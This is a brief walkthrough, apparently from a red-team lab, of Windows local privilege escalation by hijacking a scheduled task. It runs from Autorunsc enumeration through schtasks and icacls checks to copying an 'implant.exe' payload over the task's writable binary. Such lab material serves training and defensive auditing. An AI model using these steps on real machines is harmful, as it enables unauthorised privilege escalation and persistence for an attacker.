First: Let’s try to find missing tasks

Autorunsc64.exe -a t | more

Second: Let’s get more information about that task

schtasks /query /tn OneDriveChk /xml

Notice that that task is running as this user and with the Highest Privilege and also we got the path of that binary

Third: Let’s check if we can write to that path

icacls C:\\RTO\\bin\\

And yeah we have modified access

Fourth: Copy our malicious payload to that folder

copy C:\\Users\\IEUser\\Desktop\\LPE\\implant\\implant.exe C:\\RTO\\bin\\OneDriveChk.exe